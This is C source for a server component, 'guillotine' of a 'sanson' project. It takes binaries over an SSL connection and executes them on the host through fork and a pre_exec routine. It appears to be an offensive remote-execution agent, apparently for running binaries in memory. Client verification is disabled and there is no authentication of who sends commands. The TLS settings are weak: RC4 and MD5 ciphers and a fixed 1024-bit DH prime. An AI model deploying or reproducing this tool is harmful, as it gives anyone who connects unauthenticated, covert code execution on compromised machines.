#include "sanson.h"
#include "guillotine.h"

static guillotine_cmd_t list_guillotine_cmd[] = 
{
  { SANSON_CMD_SEND,	&guillotine_cmd_send	},
  { SANSON_CMD_DEL,	&guillotine_cmd_del	},
  { SANSON_CMD_EXEC,	&guillotine_cmd_exec	},
  { SANSON_CMD_LIST,	&guillotine_cmd_list	},
  { SANSON_CMD_OPTION,  &guillotine_cmd_option  },
  { SANSON_CMD_EXIT,	&guillotine_cmd_exit	},
  { SANSON_CMD_KILLGUILLOTINE, &guillotine_cmd_kmb  },
  { "",		NULL				}
};

#ifdef ENABLE_SSL
/*
 * Computing a "safe" DH-1024 prime can take a very
 * long time, so a precomputed value is provided below.
 * You may run dh_genprime to generate a new value.
 */
char *my_dhm_P = 
    "E4004C1F94182000103D883A448B3F80" \
    "2CE4B44A83301270002C20D0321CFD00" \
    "11CCEF784C26A400F43DFB901BCA7538" \
    "F2C6B176001CF5A0FD16D2C48B1D0C1C" \
    "F6AC8E1DA6BCC3B4E1F96B0564965300" \
    "FFA1D0B601EB2800F489AA512C4B248C" \
    "01F76949A60BB7F00A40B1EAB64BDD48" \
    "E8A700D60B7F1200FA8E77B0A979DABF";

char *my_dhm_G = "4";

/*
 * Sorted by order of preference
 */
int my_ciphers[] =
{
    SSL_EDH_RSA_AES_256_SHA,
    SSL_EDH_RSA_DES_168_SHA,
    SSL_RSA_AES_256_SHA,
    SSL_RSA_AES_128_SHA,
    SSL_RSA_DES_168_SHA,
    SSL_RSA_RC4_128_SHA,
    SSL_RSA_RC4_128_MD5,
    0
};

#define DEBUG_LEVEL 0

void my_debug( void *ctx, int level, char *str )
{
    if( level < DEBUG_LEVEL )
    {
        fprintf( (FILE *) ctx, "%s", str );
        fflush(  (FILE *) ctx  );
    }
}

/*
 * These session callbacks use a simple chained list
 * to store and retrieve the session information.
 */
ssl_session *s_list_1st = NULL;
ssl_session *cur, *prv;

static int my_get_session( ssl_context *ssl )
{
    time_t t = time( NULL );

    if( ssl->resume == 0 )
        return( 1 );

    cur = s_list_1st;
    prv = NULL;

    while( cur != NULL )
    {
        prv = cur;
        cur = cur->next;

        if( ssl->timeout != 0 && t - prv->start > ssl->timeout )
            continue;

        if( ssl->session->cipher != prv->cipher ||
            ssl->session->length != prv->length )
            continue;

        if( memcmp( ssl->session->id, prv->id, prv->length ) != 0 )
            continue;

        memcpy( ssl->session->master, prv->master, 48 );
        return( 0 );
    }

    return( 1 );
}

static int my_set_session( ssl_context *ssl )
{
    time_t t = time( NULL );

    cur = s_list_1st;
    prv = NULL;

    while( cur != NULL )
    {
        if( ssl->timeout != 0 && t - cur->start > ssl->timeout )
            break; /* expired, reuse this slot */

        if( memcmp( ssl->session->id, cur->id, cur->length ) == 0 )
            break; /* client reconnected */

        prv = cur;
        cur = cur->next;
    }

    if( cur == NULL )
    {
        cur = (ssl_session *) malloc( sizeof( ssl_session ) );
        if( cur == NULL )
            return( 1 );

        if( prv == NULL )
              s_list_1st = cur;
        else  prv->next  = cur;
    }

    memcpy( cur, ssl->session, sizeof( ssl_session ) );

    return( 0 );
}
#endif

int wait_judgment(guillotine_session_t *gst)
{
  int i, ret;
  char cmd[SANSON_SIZE_CMD];

  while(1)
    {
      gst->sst.forced_fd = -1;

#ifdef ENABLE_SSL
accept:
#endif
      sanson_debug("[%s:%s:%d] : Waiting new connection [%d] .... \n",
		   __FILE__,
		   __FUNCTION__,
		   __LINE__,
		   getpid());

      net_close( gst->sst.forced_fd );
#ifdef ENABLE_SSL
      ssl_free( &gst->sst.ssl_ctx );
#endif

      /* Accept a new connection */
      if (( ret = net_accept( gst->sst.fd, &gst->sst.forced_fd, NULL )) != 0)
	{
	  printf( " failed\n  ! net_accept returned %d\n\n", ret );
	  return -1;
	}

#ifdef ENABLE_SSL
      havege_init( &gst->sst.hs );
      
      if( ( ret = ssl_init( &gst->sst.ssl_ctx ) ) != 0 )
	{
	  printf( " failed\n  ! ssl_init returned %d\n\n", ret );
	  goto accept;
	}

      ssl_set_endpoint( &gst->sst.ssl_ctx, SSL_IS_SERVER );
      ssl_set_authmode( &gst->sst.ssl_ctx, SSL_VERIFY_NONE );
      
      ssl_set_rng( &gst->sst.ssl_ctx, havege_rand, &gst->sst.hs );
      ssl_set_dbg( &gst->sst.ssl_ctx, my_debug, stdout );
      ssl_set_bio( &gst->sst.ssl_ctx, net_recv, &gst->sst.forced_fd,
		   net_send, &gst->sst.forced_fd );
      ssl_set_scb( &gst->sst.ssl_ctx, my_get_session,
		   my_set_session );
      
      ssl_set_ciphers( &gst->sst.ssl_ctx, my_ciphers );
      ssl_set_session( &gst->sst.ssl_ctx, 1, 0, &gst->sst.ssn );
      
      memset( &gst->sst.ssn, 0, sizeof( ssl_session ) );
      
      ssl_set_ca_chain( &gst->sst.ssl_ctx, gst->sst.srvcert.next, NULL );
      ssl_set_own_cert( &gst->sst.ssl_ctx, &gst->sst.srvcert, &gst->sst.rsa );
      ssl_set_dh_param( &gst->sst.ssl_ctx, my_dhm_P, my_dhm_G );
      
      /*
       * 5. Handshake
       */
      printf( "  . Performing the SSL/TLS handshake...\n" );
      fflush( stdout );
      
      while( ( ret = ssl_handshake( &gst->sst.ssl_ctx ) ) != 0 )
	{
	  if( ret != XYSSL_ERR_NET_TRY_AGAIN )
	    {
	      printf( " failed\n  ! ssl_handshake returned %d\n\n", ret );
	      goto accept;
	    }
	}

      printf( " ok\n    [ Cipher is %s ]\n",
	      ssl_get_cipher( &gst->sst.ssl_ctx ) );

       if( ( ret = ssl_get_verify_result( &gst->sst.ssl_ctx ) ) != 0 )
	    {
	      printf("failed\n");
	    }
       else
	 printf(" ok\n");

#endif
      
      memset(cmd, '\0', sizeof(cmd));
      sanson_network_recv(&gst->sst, cmd, sizeof(cmd), -1);
      
      /* Find the command */
      i = 0;
      while (list_guillotine_cmd[i].func != NULL)
	{
	  if (!strncmp(list_guillotine_cmd[i].name, 
		       cmd, 
		       strlen(list_guillotine_cmd[i].name)))
	    {
	      list_guillotine_cmd[i].func(gst, cmd);
	    }
	  i++;
	}
    }      
    
  return 0;
}

int guillotine_cmd_send(guillotine_session_t *gst, char *cmd)
{
  void *binary_alloc;
  sanson_paquet_header_t spht;
  sanson_paquet_t *tmp;

  XCMP(gst, NULL, -1);

  sanson_debug("[%s:%s:%d] : CMD SEND : %s\n", 
	        __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  /* Receive the paquet header */
  memset(&spht, '\0', sizeof(sanson_paquet_header_t));
  sanson_network_recv(&gst->sst, &spht, sizeof(sanson_paquet_header_t), -1);

  sanson_paquet_header_view(&spht);

  /* Allocate the size for the binary*/
  binary_alloc = sanson_alloc(&gst->sst, spht.size);
  XCMP(binary_alloc, NULL, -1);

  /* Receive the paquet ? binary+libs */
  sanson_hexdump_set(&gst->sst, 64);
  sanson_network_recv(&gst->sst, 
		      binary_alloc, 
		      spht.size,
		      -1);
  sanson_hexdump_set(&gst->sst, -1);

  tmp = sanson_alloc(&gst->sst, sizeof(sanson_paquet_t));
  memcpy(tmp, &spht, sizeof(sanson_paquet_header_t));
  
  /* Determine the binary and libs address */
  if (tmp->spht.type == SANSON_TYPE_STATIC)
    {
      tmp->binary = binary_alloc;
      tmp->libs = NULL;
    }

  if (tmp->spht.type == SANSON_TYPE_DYN)
    {
      tmp->binary = binary_alloc;
      tmp->libs = NULL; //FIXME
    }

  /* Add the new paquet to the session */
  if (guillotine_lame_add(gst, tmp) == -1)
    {
      sanson_free(&gst->sst, binary_alloc, spht.size);
      sanson_free(&gst->sst, tmp, sizeof(sanson_paquet_t));
      return -1;
    }
  
  return 0;
}

int guillotine_cmd_del(guillotine_session_t *gst, char *cmd)
{
  char *tok, *s1;
  
  XCMP(gst, NULL, -1);

  sanson_debug("[%s:%s:%d] : CMD DEL : %s\n", 
	       __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  /* Extract the name of the paquet */
  tok = sanson_strtok_r(cmd, " ", &s1);
  tok = sanson_strtok_r(NULL, " ", &s1);

  if (tok == NULL)
    return -1;

  return guillotine_lame_del(gst, tok);
}

int guillotine_cmd_exec(guillotine_session_t *gst, char *cmd)
{
  int pnum;
  char argvenv[SANSON_SIZE_EXEC];
  sanson_paquet_t *spt;
  char *env;
  char *arg;
  char *tok, *s1;

  XCMP(gst, NULL, -1);
  
  sanson_debug("[%s:%s:%d] : CMD EXEC : %s\n", 
	        __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  pnum = fork();
  switch(pnum)
    {
    case 0 :
      close(gst->sst.fd);
      
      tok = sanson_strtok_r(cmd, " ", &s1);
      tok = sanson_strtok_r(NULL, " ", &s1);
      
      if (tok == NULL)
	return -1;
      
      memset(argvenv, '\0', sizeof(argvenv));
      sanson_network_recv(&gst->sst, argvenv, sizeof(argvenv), -1);
      
      arg = argvenv;
      while (*arg != '\0')
	arg++;
      
      arg++;
      env = arg;
      arg = argvenv;
      
      sanson_debug("EXEC %s with %s %s\n", tok, arg, env);
      
      spt = guillotine_lame_name_get(gst, tok);
      
      pre_exec(gst, spt, arg, env);
      
      break;
    case -1 :
      perror("fork");
      return -1;
	  
    default :
      close(gst->sst.forced_fd);
      waitpid(pnum, 0, 0);
    }
  
  return 0;
}

int guillotine_cmd_list(guillotine_session_t *gst, char *cmd)
{
  sanson_paquet_t *tmp;
  sanson_paquet_t spt;

  XCMP(gst, NULL, -1);

  sanson_debug("[%s:%s:%d] : CMD LIST : %s\n", 
	       __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  guillotine_lame_ls(gst);

  for (tmp = gst->sst.tailq_spt_t.tqh_first; tmp != NULL; tmp = tmp->entries.tqe_next)
    {
      sanson_network_send(&gst->sst, tmp, sizeof(sanson_paquet_t), -1);
    }
  
  memset(&spt, '\0', sizeof(sanson_paquet_t));
  sanson_network_send(&gst->sst, &spt, sizeof(sanson_paquet_t), -1);

  return 0;
}

int guillotine_cmd_option(guillotine_session_t *gst, char *cmd)
{
  char *tok, *tok2, *s1;
  int value_int;
  unsigned long value_long;

  XCMP(gst, NULL, -1);

  sanson_debug("[%s:%s:%d] : CMD OPTION : %s\n", 
	       __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  value_int = value_long = -1;

  /* Extract the option of the paquet */
  tok = sanson_strtok_r(cmd, " ", &s1);
  XCMP(tok, NULL, -1);
  tok = sanson_strtok_r(NULL, " ", &s1);
  XCMP(tok, NULL, -1);

  /* Extract the value of the paquet */
  tok2 = sanson_strtok_r(NULL, " ", &s1);
  XCMP(tok2, NULL, -1);

  if (!strcmp(tok, "find_name"))
    {
      value_int = atoi(tok2);
      gst->sst.find_name = value_int;
    }
  else if(!strcmp(tok, "ul_make_vt"))
    {
      value_int = atoi(tok2);
      gst->sst.ul_make_vt = value_int;
    }
  else if(!strcmp(tok, "ul_maps_down"))
    {
      value_int = atoi(tok2);
      gst->sst.ul_maps_down = value_int;
    }
  else if(!strcmp(tok, "alloc"))
    {
      value_int = atoi(tok2);
      gst->sst.alloc = value_int;
    }
  else if(!strcmp(tok, "random"))
    {
      value_int = atoi(tok2);
      gst->sst.random = value_int;
    }
  else if(!strcmp(tok, "key"))
    {
      memset(&gst->sst.key, '\0', sizeof(gst->sst.key));
      snprintf((char *)gst->sst.key, 
	       sizeof(gst->sst.key),
	       "%s",
	       tok2);
      gst->sst.keylen = strlen((const char *)&gst->sst.key);
      printf("KEY %s %d\n", gst->sst.key, gst->sst.keylen);
    }

  if (value_int != -1)
    {
      sanson_debug("[%s:%s:%d] : OPTION %s VALUE %d\n", 
		   __FILE__,
		   __FUNCTION__,
		   __LINE__,
		   tok,
		   value_int);
    }
  else 
    {
      sanson_debug("[%s:%s:%d] : OPTION %s VALUE 0x%lx\n", 
		   __FILE__,
		   __FUNCTION__,
		   __LINE__,
		   tok,
		   value_long);
    }

  return 0;
}

int guillotine_cmd_exit(guillotine_session_t *gst, char *cmd)
{
  XCMP(gst, NULL, -1);

  sanson_debug("[%s:%s:%d] : CMD EXIT : %s\n", 
	        __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  sanson_network_close(&gst->sst);

  exit(0);

  return 0;
}

int guillotine_cmd_kmb(guillotine_session_t *gst, char *cmd)
{
  XCMP(gst, NULL, -1);

  sanson_debug("[%s:%s:%d] : CMD KILLMEBABY : %s\n", 
	        __FILE__,
	       __FUNCTION__,
	       __LINE__,
	       cmd);

  close(gst->sst.forced_fd);
  close(gst->sst.fd);
  exit(0);

  return 0;
}

